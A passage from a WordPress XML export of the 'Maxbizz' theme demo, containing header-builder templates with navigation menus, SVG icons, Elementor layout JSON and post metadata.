				<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 384"><path d="m343.59375 101.039062c-7.953125 3.847657-11.28125 13.417969-7.433594 21.367188 10.511719 21.714844 15.839844 45.121094 15.839844 69.59375 0 88.222656-71.777344 160-160 160s-160-71.777344-160-160 71.777344-160 160-160c36.558594 0 70.902344 11.9375 99.328125 34.519531 6.894531 5.503907 16.976563 4.351563 22.480469-2.566406 5.503906-6.914063 4.351562-16.984375-2.570313-22.480469-33.652343-26.746094-76-41.472656-119.238281-41.472656-105.863281 0-192 86.136719-192 192s86.136719 192 192 192 192-86.136719 192-192c0-29.335938-6.40625-57.449219-19.039062-83.527344-3.839844-7.96875-13.441407-11.289062-21.367188-7.433594zm0 0"></path><path d="m192 64c-8.832031 0-16 7.167969-16 16v112c0 8.832031 7.167969 16 16 16h80c8.832031 0 16-7.167969 16-16s-7.167969-16-16-16h-64v-96c0-8.832031-7.167969-16-16-16zm0 0"></path></svg>				
				<h6>
					Our Working Hours
				</h6>
								<p>Mon - Sat: 8.00 - 18.00</p>
						<nav id="site-navigation">			
				<ul id="primary-menu"><li id="menu-item-361"><a href="http://wpdemo.archiwp.com/maxbizz/">Home</a></li>
<li id="menu-item-363"><a href="#">Pages</a>
<ul>
	<li id="menu-item-759"><a href="http://wpdemo.archiwp.com/maxbizz/about-us/">About Us</a></li>
	<li id="menu-item-1043"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/">Our Services 1</a></li>
	<li id="menu-item-1021"><a href="http://wpdemo.archiwp.com/maxbizz/services-with-icon/">Our Services 2</a></li>
	<li id="menu-item-764"><a href="http://wpdemo.archiwp.com/maxbizz/our-core-values/">Our Core Values</a></li>
	<li id="menu-item-765"><a href="http://wpdemo.archiwp.com/maxbizz/our-team/">Our Team</a></li>
	<li id="menu-item-766"><a href="http://wpdemo.archiwp.com/maxbizz/our-team/single-team/">Single Team</a></li>
	<li id="menu-item-762"><a href="http://wpdemo.archiwp.com/maxbizz/elements/">Elements</a></li>
	<li id="menu-item-767"><a href="http://wpdemo.archiwp.com/maxbizz/typography/">Typography</a></li>
	<li id="menu-item-763"><a href="http://wpdemo.archiwp.com/maxbizz/faqs/">FAQs</a></li>
	<li id="menu-item-758"><a href="http://wpdemo.archiwp.com/maxbizz/404-2/">404</a></li>
	<li id="menu-item-760"><a href="http://wpdemo.archiwp.com/maxbizz/coming-soon/">Coming Soon</a></li>
</ul>
</li>
<li id="menu-item-1041"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-grid/">Portfolio</a>
<ul>
	<li id="menu-item-1044"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-grid/">Portfolio Grid</a></li>
	<li id="menu-item-1042"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-masonry/">Portfolio Masonry</a></li>
	<li id="menu-item-1040"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-carousel/">Portfolio Carousel</a></li>
	<li id="menu-item-1149"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio/digital-marketing/">Portfolio Details</a></li>
</ul>
</li>
<li id="menu-item-1022"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/">Services</a>
<ul>
	<li id="menu-item-1020"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/">Marketing Research</a></li>
	<li id="menu-item-1019"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">Organizational Audit</a></li>
	<li id="menu-item-1018"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Business Consulting</a></li>
	<li id="menu-item-1017"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Project Management</a></li>
	<li id="menu-item-1016"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">Support Function</a></li>
	<li id="menu-item-1015"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">Finance Planning</a></li>
</ul>
</li>
<li id="menu-item-771"><a href="http://wpdemo.archiwp.com/maxbizz/blog/">Blog</a>
<ul>
	<li id="menu-item-1045"><a href="http://wpdemo.archiwp.com/maxbizz/blog/">Blog List</a></li>
	<li id="menu-item-1068"><a href="http://wpdemo.archiwp.com/maxbizz/the-future-of-retail-asias-ecosystems/">Blog Post</a></li>
</ul>
</li>
<li id="menu-item-761"><a href="http://wpdemo.archiwp.com/maxbizz/contacts/">Contacts</a></li>
</ul>			</nav>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Instagram
											</a>
				<!-- Form Search on Header -->
						<form role="search" method="get" action="http://wpdemo.archiwp.com/maxbizz/" >
    <label>Search for:
    <input type="search" placeholder="Search&hellip;" value="" name="s" /></label>
	<button type="submit"></button>
    </form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>182</wp:post_id>
		<wp:post_date><![CDATA[2020-07-24 03:48:42]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-07-24 03:48:42]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-3]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"15f82ce","elType":"section","settings":{"content_position":"middle","structure":"20","padding":{"unit":"px","top":"22","right":"0","bottom":"43","left":"0","isLinked":false},"background_background":"classic","background_color":"#282828","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"}},"elements":[{"id":"d78080f","elType":"column","settings":{"_column_size":50,"_inline_size":20},"elements":[{"id":"2b1b8bd","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/03_White.svg","id":377},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"d4b56e5","elType":"column","settings":{"_column_size":50,"_inline_size":80,"_ot_content_align":"horizontal","align":"flex-end"},"elements":[{"id":"cd56b26","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#D92300","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":0,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":1420},"library":"svg"},"title_color":"#A5A5A5","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"0","isLinked":false},"link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"},{"id":"3c30484","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#D92300","icon_size":{"unit":"px","size":24,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":0,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":1419},"library":"svg"},"title_color":"#A5A5A5","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"60","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"74c4536","elType":"widget","settings":{"title_text":"Our Working Hours","description_text":"Mon - Sat: 8.00 - 18.00","position":"left","title_size":"h6","primary_color":"#D92300","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":0,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/symbol.svg","id":356},"library":"svg"},"title_color":"#A5A5A5","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"60","isLinked":false}},"elements":[],"widgetType":"icon-box"}],"isInner":false}],"isInner":false},{"id":"3346a7f","elType":"section","settings":{"content_width":{"unit":"px","size":1280,"sizes":[]},"background_background":"classic","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"margin":{"unit":"px","top":"-33","right":0,"bottom":"0","left":0,"isLinked":false}},"elements":[{"id":"7fae78a","elType":"column","settings":{"_column_size":100,"_inline_size":null,"content_position":"center","align":"flex-end","_ot_column_min_width":{"unit":"px","size":220,"sizes":[]},"_ot_content_align":"horizontal"},"elements":[{"id":"4d3a690","elType":"section","settings":{"layout":"full_width","structure":"20","background_background":"classic","background_color":"#FFFFFF","border_radius":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"padding":{"unit":"px","top":"0","right":"40","bottom":"0","left":"40","isLinked":false}},"elements":[{"id":"911d327","elType":"column","settings":{"_column_size":50,"_inline_size":74.957999999999998408384271897375583648681640625,"_ot_content_align":"horizontal"},"elements":[{"id":"82c5870","elType":"widget","settings":{"nav_menu":"main-menu","text_hover_color":"#D92300","menu_typography_typography":"custom","menu_typography_font_family":"Raleway","menu_typography_font_weight":"700"},"elements":[],"widgetType":"imenu"}],"isInner":true},{"id":"e0ea046","elType":"column","settings":{"_column_size":50,"_inline_size":25.042000000000001591615728102624416351318359375,"align":"flex-end","_ot_content_align":"horizontal"},"elements":[{"id":"9e80548","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"0d77827","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"#02010100","__globals__":{"item_icon_primary_color":""}},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"04b0949","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"d468e5b","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)"},{"social_icon":{"value":"fab fa-instagram","library":"fa-brands"},"link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)","_id":"e7140d6"}],"shape":"circle","align":"","icon_size":{"unit":"px","size":12,"sizes":[]},"icon_padding":{"unit":"em","size":0.5,"sizes":[]},"icon_spacing":{"unit":"px","size":8,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"#C9C9C9","_padding":{"unit":"px","top":"22","right":"0","bottom":"22","left":"0","isLinked":false},"icon_color":"custom","hover_primary_color":"#D92300","hover_border_color":"#D92300","icon_secondary_color":"#373737","hover_secondary_color":"#FFFFFF"},"elements":[],"widgetType":"social-icons"},{"id":"60be152","elType":"widget","settings":{"bg_btn":"#D92300","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"40","isLinked":false}},"elements":[],"widgetType":"isearch"},{"id":"3b1d036","elType":"widget","settings":{"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"20","isLinked":false}},"elements":[],"widgetType":"isidepanel"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:5;s:15:"control_percent";i:2;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:5:{s:12:"_inline_size";i:5;s:17:"_ot_content_align";i:4;s:5:"align";i:3;s:16:"content_position";i:1;s:20:"_ot_column_min_width";i:1;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:8;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:1;}}s:5:"style";a:2:{s:18:"section_style_icon";a:3:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;}s:21:"section_style_content";a:12:{s:26:"content_vertical_alignment";i:3;s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:3;}}}}s:7:"section";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:16:"content_position";i:1;s:6:"layout";i:1;s:13:"content_width";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:2;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:2;s:6:"margin";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:3;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:26:"box_shadow_box_shadow_type";i:2;s:21:"box_shadow_box_shadow";i:3;s:13:"border_radius";i:1;}}}}s:5:"imenu";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:1:{s:5:"style";a:1:{s:18:"style_menu_section";a:4:{s:16:"text_hover_color";i:1;s:26:"menu_typography_typography";i:1;s:27:"menu_typography_font_family";i:1;s:27:"menu_typography_font_weight";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:7;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:5:"shape";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:8:{s:9:"icon_size";i:1;s:12:"icon_padding";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:10:"icon_color";i:1;s:20:"icon_secondary_color";i:1;}s:20:"section_social_hover";a:3:{s:19:"hover_primary_color";i:1;s:18:"hover_border_color";i:1;s:21:"hover_secondary_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_form_section";a:1:{s:6:"bg_btn";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:10:"isidepanel";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header 4</title>
		<link>http://wpdemo.archiwp.com/maxbizz/ot_header_builders/header-4/</link>
		<pubDate>Fri, 24 Jul 2020 06:55:21 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=217</guid>
		<description></description>
		<content:encoded><![CDATA[<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 384"><path d="m343.59375 101.039062c-7.953125 3.847657-11.28125 13.417969-7.433594 21.367188 10.511719 21.714844 15.839844 45.121094 15.839844 69.59375 0 88.222656-71.777344 160-160 160s-160-71.777344-160-160 71.777344-160 160-160c36.558594 0 70.902344 11.9375 99.328125 34.519531 6.894531 5.503907 16.976563 4.351563 22.480469-2.566406 5.503906-6.914063 4.351562-16.984375-2.570313-22.480469-33.652343-26.746094-76-41.472656-119.238281-41.472656-105.863281 0-192 86.136719-192 192s86.136719 192 192 192 192-86.136719 192-192c0-29.335938-6.40625-57.449219-19.039062-83.527344-3.839844-7.96875-13.441407-11.289062-21.367188-7.433594zm0 0"></path><path d="m192 64c-8.832031 0-16 7.167969-16 16v112c0 8.832031 7.167969 16 16 16h80c8.832031 0 16-7.167969 16-16s-7.167969-16-16-16h-64v-96c0-8.832031-7.167969-16-16-16zm0 0"></path></svg>						
										  Mon - Sat: 8.00 - 18.00
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>						
										411 University St, Seattle
									</li>
								<li>
					<a href="tel:+1-800-456-478-23">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>						
										+1-800-456-478-23
											</a>
									</li>
						</ul>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Instagram
											</a>
			<a href="#" role="button">
						FREE QUOTE
					</a>
				<a href="http://wpdemo.archiwp.com/maxbizz/">
					<img src="https://maxbizz.s3.amazonaws.com/images/04_Black.svg" alt="Maxbizz">
				</a>			        
						<nav id="site-navigation">			
				<ul id="primary-menu"><li id="menu-item-361"><a href="http://wpdemo.archiwp.com/maxbizz/">Home</a></li>
<li id="menu-item-363"><a href="#">Pages</a>
<ul>
	<li id="menu-item-759"><a href="http://wpdemo.archiwp.com/maxbizz/about-us/">About Us</a></li>
	<li id="menu-item-1043"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/">Our Services 1</a></li>
	<li id="menu-item-1021"><a href="http://wpdemo.archiwp.com/maxbizz/services-with-icon/">Our Services 2</a></li>
	<li id="menu-item-764"><a href="http://wpdemo.archiwp.com/maxbizz/our-core-values/">Our Core Values</a></li>
	<li id="menu-item-765"><a href="http://wpdemo.archiwp.com/maxbizz/our-team/">Our Team</a></li>
	<li id="menu-item-766"><a href="http://wpdemo.archiwp.com/maxbizz/our-team/single-team/">Single Team</a></li>
	<li id="menu-item-762"><a href="http://wpdemo.archiwp.com/maxbizz/elements/">Elements</a></li>
	<li id="menu-item-767"><a href="http://wpdemo.archiwp.com/maxbizz/typography/">Typography</a></li>
	<li id="menu-item-763"><a href="http://wpdemo.archiwp.com/maxbizz/faqs/">FAQs</a></li>
	<li id="menu-item-758"><a href="http://wpdemo.archiwp.com/maxbizz/404-2/">404</a></li>
	<li id="menu-item-760"><a href="http://wpdemo.archiwp.com/maxbizz/coming-soon/">Coming Soon</a></li>
</ul>
</li>
<li id="menu-item-1041"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-grid/">Portfolio</a>
<ul>
	<li id="menu-item-1044"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-grid/">Portfolio Grid</a></li>
	<li id="menu-item-1042"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-masonry/">Portfolio Masonry</a></li>
	<li id="menu-item-1040"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-carousel/">Portfolio Carousel</a></li>
	<li id="menu-item-1149"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio/digital-marketing/">Portfolio Details</a></li>
</ul>
</li>
<li id="menu-item-1022"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/">Services</a>
<ul>
	<li id="menu-item-1020"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/">Marketing Research</a></li>
	<li id="menu-item-1019"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">Organizational Audit</a></li>
	<li id="menu-item-1018"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Business Consulting</a></li>
	<li id="menu-item-1017"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Project Management</a></li>
	<li id="menu-item-1016"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">Support Function</a></li>
	<li id="menu-item-1015"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">Finance Planning</a></li>
</ul>
</li>
<li id="menu-item-771"><a href="http://wpdemo.archiwp.com/maxbizz/blog/">Blog</a>
<ul>
	<li id="menu-item-1045"><a href="http://wpdemo.archiwp.com/maxbizz/blog/">Blog List</a></li>
	<li id="menu-item-1068"><a href="http://wpdemo.archiwp.com/maxbizz/the-future-of-retail-asias-ecosystems/">Blog Post</a></li>
</ul>
</li>
<li id="menu-item-761"><a href="http://wpdemo.archiwp.com/maxbizz/contacts/">Contacts</a></li>
</ul>			</nav>
				<a href="http://wpdemo.archiwp.com/maxbizz/cart/" title="View your shopping cart"> 0
				</a>
				<!-- Form Search on Header -->
						<form role="search" method="get" action="http://wpdemo.archiwp.com/maxbizz/" >
    <label>Search for:
    <input type="search" placeholder="Search&hellip;" value="" name="s" /></label>
	<button type="submit"></button>
    </form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>217</wp:post_id>
		<wp:post_date><![CDATA[2020-07-24 06:55:21]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-07-24 06:55:21]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-4]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"2bd5f14","elType":"section","settings":{"content_position":"middle","structure":"21","background_background":"classic","background_color":"#0B2A41","margin":{"unit":"px","top":"","right":0,"bottom":"","left":0,"isLinked":true}},"elements":[{"id":"f191d30","elType":"column","settings":{"_column_size":66,"_inline_size":null},"elements":[{"id":"6d41460","elType":"widget","settings":{"view":"inline","icon_list":[{"text":"  Mon - Sat: 8.00 - 18.00","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/symbol.svg","id":356},"library":"svg"},"_id":"e6e2d89"},{"text":"411 University St, Seattle","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":1419},"library":"svg"},"_id":"6e383c8"},{"text":"+1-800-456-478-23","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":1420},"library":"svg"},"_id":"25c4675","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":45,"sizes":[]},"icon_color":"#55BB53","text_color":"#FFFFFF","text_indent":{"unit":"px","size":7,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_line_height":{"unit":"em","size":1,"sizes":[]},"icon_size":{"unit":"px","size":15,"sizes":[]},"icon_typography_font_weight":"500"},"elements":[],"widgetType":"icon-list"}],"isInner":false},{"id":"eb1b801","elType":"column","settings":{"_column_size":33,"_inline_size":null,"align":"flex-end","_ot_content_align":"horizontal"},"elements":[{"id":"99b486b","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"0d77827","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(255, 255, 255, 0)"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"04b0949","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"d468e5b","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)"},{"social_icon":{"value":"fab fa-instagram","library":"fa-brands"},"link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)","_id":"e7140d6"}],"shape":"circle","align":"","icon_size":{"unit":"px","size":12,"sizes":[]},"icon_spacing":{"unit":"px","size":20,"sizes":[]},"image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 